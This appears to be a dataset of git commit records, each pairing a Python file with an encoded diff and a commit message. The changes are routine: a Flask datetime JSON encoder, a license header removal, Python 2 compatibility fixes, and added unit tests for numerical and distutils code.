api.add_resource(ICSApi, '/ics/', methods=['GET', 'POST'], endpoint='ics')
api.add_resource(ICSApi, '/ics/<string:ics_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='ics_name')
@app.route('/')
def splash():
return render_template('splash.html')
@app.route('/add_event')
def add_event():
return render_template('add_event.html')
@app.route('/add_label')
def add_label():
return render_template('add_label.html')
if __name__ == '__main__':
app.debug = os.getenv('FLASK_DEBUG') != 'False' # updates the page as the code is saved
HOST = '0.0.0.0' if 'PORT' in os.environ else '127.0.0.1'
PORT = int(os.environ.get('PORT', 3000))
app.run(host='0.0.0.0', port=PORT)
|
Python
| 0.999999
|
@@ -197,16 +197,82 @@
to https
+%0Afrom flask.json import JSONEncoder%0A%0Afrom datetime import datetime
%0A%0Aimport
@@ -614,16 +614,261 @@
i(app)%0A%0A
+%0Aclass CustomJSONEncoder(JSONEncoder):%0A%0A def default(self, obj):%0A if isinstance(obj, datetime):%0A return obj.isoformat()%0A else:%0A return JSONEncoder.default(self, obj)%0A%0A%0Aapp.json_encoder = CustomJSONEncoder%0A%0A
# add re
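Decoded, the two hunks add imports and register a custom JSON encoder so datetime values serialize as ISO 8601:

from flask.json import JSONEncoder

from datetime import datetime


class CustomJSONEncoder(JSONEncoder):

    def default(self, obj):
        # Emit ISO 8601 for datetimes; defer everything else to the base encoder.
        if isinstance(obj, datetime):
            return obj.isoformat()
        else:
            return JSONEncoder.default(self, obj)


app.json_encoder = CustomJSONEncoder

With the encoder registered, jsonify emits strings like "2017-06-26T14:30:00" instead of the RFC 822 style date Flask produces by default (the sample timestamp is illustrative, not from the record).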
|
ba1494afb962fb8fba84e306cfb4c26a83602b6d
|
update license
|
drink.py
|
drink.py
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2014 Chuck Housley
This work is free. You can redistribute it and/or modify it under the
terms of the Do What The Fuck You Want To Public License, Version 2,
as published by Sam Hocevar. See the COPYING file for more details.
"""
import os
from server import app, db
import server.model
if __name__ == "__main__":
db.create_all()
app.run(debug=True) # host='10.10.56.190')
|
Python
| 0
|
@@ -21,257 +21,8 @@
-*-%0A
-%22%22%22%0ACopyright (C) 2014 Chuck Housley%0AThis work is free. You can redistribute it and/or modify it under the%0Aterms of the Do What The Fuck You Want To Public License, Version 2,%0Aas published by Sam Hocevar. See the COPYING file for more details.%0A%22%22%22%0A%0A
impo
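Despite the subject "update license", the hunk decodes to a pure deletion: the WTFPL header docstring is removed. The file then opens with (blank-line placement approximate, since the dump collapses empty lines):

# -*- coding: utf-8 -*-
import os

from server import app, db
import server.model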
|
6b56ab963f46ac45caf0a2f3391fdedf9dfabb39
|
Fix python2 compatibility
|
create_dataset.py
|
create_dataset.py
|
import os
import shutil
import spotipy
import pickle
import pandas as pd
import numpy as np
from collections import Counter
if not os.path.exists("genres.p"):
# Login to Spotify and get your OAuth token:
# https://developer.spotify.com/web-api/search-item/
AUTH = "BQBHlFpkjjlfDwbyQ7v0F1p_cejpmYARG6KDclVlP3HZyb4MG3_Mc40tE__HsuFXGQvYRvOi1Mbfx-_FoA9DVXCpNupL0X8XFFbL1XghQCf6mH_yXc82GqWAtrLjUtc-eWIDBpci1M0"
if not os.path.exists('clean_midi'):
# Download the 'Clean MIDI' dataset from http://colinraffel.com/projects/lmd/
import urllib.request
import io
import gzip
FILE_URL = 'http://hog.ee.columbia.edu/craffel/lmd/clean_midi.tar.gz'
response = urllib.request.urlopen(FILE_URL)
compressed_file = io.BytesIO(response.read())
decompressed_file = gzip.GzipFile(fileobj=compressed_file)
with open(OUTFILE_PATH, 'wb') as outfile:
outfile.write(decompressed_file.read())
# Get artists from folder names
artists = [item for item in os.listdir(
'clean_midi') if not item.startswith('.')]
sp = spotipy.Spotify(auth=AUTH)
genres = {}
for i, artist in enumerate(artists):
try:
results = sp.search(q=artist, type='artist', limit=1)
items = results['artists']['items']
genre_list = items[0]['genres'] if len(items) else items['genres']
genres[artist] = genre_list
if i < 5:
print(artist, genre_list[:5])
except Exception as e:
print(artist, e)
# Save to pickle file
pickle.dump(genres, open("genres.p", "wb"))
else:
# Load genres meta-data
genres = pickle.load(open("genres.p", "rb"))
# Get the most common genres
flattened_list = [item for sublist in list(
genres.values()) for item in sublist]
MIDI_DIR = os.path.join(os.getcwd(), 'clean_midi')
def get_artists(genre):
"""Get artists with label `genre`."""
artists = [artist for artist, gs in genres.items() if genre in gs]
return artists
# Get artist with genres 'soft rock' and 'disco'
genre_data = {}
metal = get_artists('metal')
classical = get_artists('classical')
genre_data['metal'] = metal
genre_data['classical'] = classical
# Copy artists to a genre-specific folder
for genre, artists in genre_data.items():
try:
for artist in artists:
shutil.copytree(os.path.join(MIDI_DIR, artist), os.path.join(
os.getcwd(), 'subsets', genre, artist))
except Exception as e:
print(e)
|
Python
| 0.000303
|
@@ -1,12 +1,51 @@
+from __future__ import print_function%0A%0A
import os%0Aim
@@ -125,16 +125,17 @@
as np%0A%0A
+%0A
from col
@@ -1675,16 +1675,28 @@
%22, %22wb%22)
+, protocol=2
)%0Aelse:%0A
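Decoded, the three hunks amount to a __future__ import, one cosmetic blank line, and a pickle protocol pin:

from __future__ import print_function  # print() becomes a function on Python 2

# ... body unchanged ...

# Protocol 2 is the highest pickle protocol Python 2 can read back.
pickle.dump(genres, open("genres.p", "wb"), protocol=2)

The compatibility fix is partial as committed: the download branch still uses urllib.request, which exists only on Python 3.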
|
1b726978e1604269c8c4d2728a6f7ce774e5d16d
|
Fix edit control assessment modal
|
src/ggrc/models/control_assessment.py
|
src/ggrc/models/control_assessment.py
|
# Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: anze@reciprocitylabs.com
# Maintained By: anze@reciprocitylabs.com
from ggrc import db
from .mixins import (
deferred, BusinessObject, Timeboxed, CustomAttributable, TestPlanned
)
from .object_document import Documentable
from .object_owner import Ownable
from .object_person import Personable
from .relationship import Relatable
from .track_object_state import HasObjectState, track_state_for_class
from ggrc.models.reflection import PublishOnly
class ControlAssessment(HasObjectState, TestPlanned, CustomAttributable,
Documentable, Personable, Timeboxed, Ownable,
Relatable, BusinessObject, db.Model):
__tablename__ = 'control_assessments'
design = deferred(db.Column(db.String), 'ControlAssessment')
operationally = deferred(db.Column(db.String), 'ControlAssessment')
control_id = db.Column(db.Integer, db.ForeignKey('controls.id'))
control = db.relationship('Control', foreign_keys=[control_id])
# REST properties
_publish_attrs = [
'design',
'operationally',
'control'
]
track_state_for_class(ControlAssessment)
|
Python
| 0
|
@@ -1133,16 +1133,88 @@
l_id%5D)%0A%0A
+ audit = %7B%7D # we add this for the sake of client side error checking%0A%0A
# REST
@@ -1300,16 +1300,44 @@
control'
+,%0A PublishOnly('audit')
%0A %5D%0A%0Atr
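The two hunks decoded: a placeholder audit attribute on the model plus a matching PublishOnly entry, exposing the field read-only for the client-side error checking the inline comment mentions:

    control = db.relationship('Control', foreign_keys=[control_id])

    audit = {}  # we add this for the sake of client side error checking

    # REST properties
    _publish_attrs = [
        'design',
        'operationally',
        'control',
        PublishOnly('audit')
    ]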
|
e7d9a67611b2dc443c1f2bc23506323837d79bda
|
fix test_mcp
|
numerics/swig/tests/test_mcp.py
|
numerics/swig/tests/test_mcp.py
|
# Copyright (C) 2005, 2012 by INRIA
#!/usr/bin/env python
import numpy as np
import siconos.numerics as N
def mcp_function (z) :
M = np.array([[2., 1.],
[1., 2.]])
q = np.array([-5., -6.])
return dot(M,z) + q
def mcp_Nablafunction (z) :
M = np.array([[2., 1.],
[1., 2.]])
return M
# solution
zsol = np.array([4./3., 7./3.])
wsol = np.array([0. , 0.])
# problem
#mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
ztol = 1e-8
def test_new():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
def test_mcp_FB():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
z = np.array([0., 0.])
w = np.array([0., 0.])
SO=N.SolverOptions(mcp,N.SICONOS_MCP_FB)
N.mcp_driver_init(mcp, SO)
info = N.mcp_FischerBurmeister(mcp, z, w, SO)
N.mcp_driver_reset(mcp, SO)
#print("z = ", z)
#print("w = ", w)
assert (np.linalg.norm(z-zsol) <= ztol)
assert not info
|
Python
| 0.00002
|
@@ -109,37 +109,35 @@
def mcp_function
-
(z)
-
:%0A M = np.arr
@@ -157,32 +157,35 @@
%0A
+
%5B1., 2.%5D%5D)%0A%0A
@@ -220,16 +220,19 @@
return
+np.
dot(M,z)
@@ -262,13 +262,11 @@
tion
-
(z)
-
:%0A
@@ -283,32 +283,35 @@
rray(%5B%5B2., 1.%5D,%0A
+
%5B
@@ -501,34 +501,36 @@
mcp=N.MCP(1,
+
1,
+
mcp_function,mcp
@@ -518,32 +518,33 @@
1, mcp_function,
+
mcp_Nablafunctio
@@ -547,18 +547,16 @@
ction)%0A%0A
-%0A%0A
def test
@@ -829,25 +829,24 @@
cp, SO)%0A
-#
print(%22z = %22
@@ -854,17 +854,16 @@
z)%0A
-#
print(%22w
@@ -935,9 +935,8 @@
ot info%0A
-%0A
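Most hunks only normalize whitespace and re-enable the two diagnostic prints; the functional fix is qualifying the bare dot call, which would otherwise raise NameError when the solver first evaluates the callback (only numpy is imported, as np). The decoded function:

def mcp_function(z):
    M = np.array([[2., 1.],
                  [1., 2.]])
    q = np.array([-5., -6.])
    # np.dot replaces the bare dot(M, z), which was undefined in this module
    return np.dot(M, z) + q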
|
2fbdd9903fc9bf6e1fe797e92c0157abd67850ce
|
add robust tests for exec_command()
|
numpy/distutils/tests/test_exec_command.py
|
numpy/distutils/tests/test_exec_command.py
|
import sys
import StringIO
from numpy.distutils import exec_command
class redirect_stdout(object):
"""Context manager to redirect stdout for exec_command test."""
def __init__(self, stdout=None):
self._stdout = stdout or sys.stdout
def __enter__(self):
self.old_stdout = sys.stdout
sys.stdout = self._stdout
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush()
sys.stdout = self.old_stdout
def test_exec_command():
# Regression test for gh-2999 and gh-2915.
# There are several packages (nose, scipy.weave.inline, Sage inline
# Fortran) that replace stdout, in which case it doesn't have a fileno
# method. This is tested here, with a do-nothing command that fails if the
# presence of fileno() is assumed in exec_command.
with redirect_stdout(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
|
Python
| 0.000001
|
@@ -1,12 +1,22 @@
+import os%0A
import sys%0Ai
@@ -475,16 +475,765 @@
stdout%0A%0A
+class redirect_stderr(object):%0A %22%22%22Context manager to redirect stderr for exec_command test.%22%22%22%0A def __init__(self, stderr=None):%0A self._stderr = stderr or sys.stderr%0A%0A def __enter__(self):%0A self.old_stderr = sys.stderr%0A sys.stderr = self._stderr%0A%0A def __exit__(self, exc_type, exc_value, traceback):%0A self._stderr.flush()%0A sys.stderr = self.old_stderr%0A%0Aclass emulate_nonposix(object):%0A %22%22%22Context manager to emulate os.name != 'posix' %22%22%22%0A def __init__(self, osname='non-posix'):%0A self._new_name = osname%0A%0A def __enter__(self):%0A self._old_name = os.name%0A os.name = self._new_name%0A%0A def __exit__(self, exc_type, exc_value, traceback):%0A os.name = self._old_name%0A%0A
%0Adef tes
@@ -1246,16 +1246,23 @@
_command
+_stdout
():%0A
@@ -1585,16 +1585,43 @@
command.
+%0A%0A # Test posix version:
%0A wit
@@ -1705,8 +1705,518 @@
'.'%22)%0A%0A
+ # Test non-posix version:%0A with emulate_nonposix():%0A with redirect_stdout(StringIO.StringIO()):%0A exec_command.exec_command(%22cd '.'%22)%0A%0Adef test_exec_command_stderr():%0A # Test posix version:%0A with redirect_stderr(StringIO.StringIO()):%0A exec_command.exec_command(%22cd '.'%22)%0A%0A # Test non-posix version:%0A # Note: this test reveals a failure%0A #with emulate_nonposix():%0A # with redirect_stderr(StringIO.StringIO()):%0A # exec_command.exec_command(%22cd '.'%22)%0A
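The diff decodes to an os import, a redirect_stderr twin of the stdout context manager, a new emulate_nonposix helper, and a split into test_exec_command_stdout and test_exec_command_stderr, each exercised under both os.name settings. The key new helper, reproduced with indentation restored:

class emulate_nonposix(object):
    """Context manager to emulate os.name != 'posix' """
    def __init__(self, osname='non-posix'):
        self._new_name = osname

    def __enter__(self):
        # Swap os.name so exec_command takes its non-posix code path.
        self._old_name = os.name
        os.name = self._new_name

    def __exit__(self, exc_type, exc_value, traceback):
        os.name = self._old_name

The non-posix variant of the stderr test stays commented out, with a note in the diff that it reveals a failure.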
|